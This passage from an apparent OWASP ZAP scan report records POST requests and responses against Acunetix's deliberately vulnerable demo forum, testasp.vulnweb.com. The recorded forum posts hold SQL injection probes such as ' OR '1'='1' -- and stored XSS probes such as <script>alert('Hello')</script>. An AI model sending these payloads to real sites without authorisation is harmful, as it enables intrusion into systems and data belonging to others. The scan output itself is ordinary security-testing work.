--></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 4913 |
| Response Body - size: 4,913 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln 